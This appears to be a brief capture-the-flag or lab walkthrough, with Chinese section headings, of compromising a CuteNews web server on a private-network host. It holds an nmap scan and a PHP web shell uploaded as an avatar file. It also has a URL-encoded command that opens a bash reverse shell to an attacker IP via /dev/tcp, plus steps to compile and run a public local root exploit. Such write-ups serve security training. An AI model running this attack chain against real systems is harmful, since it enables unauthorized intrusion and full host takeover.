信息收集
IP Address | Opening Ports |
---|---|
192.168.8.104 | TCP:80 |
$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV
bash
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)
本地权限
注册用户登录
Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"
http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27
权限提升
$ cat /etc/os-release
https://www.exploit-db.com/exploits/36746
$ gcc 36746.c -static -o 36746
# ./36746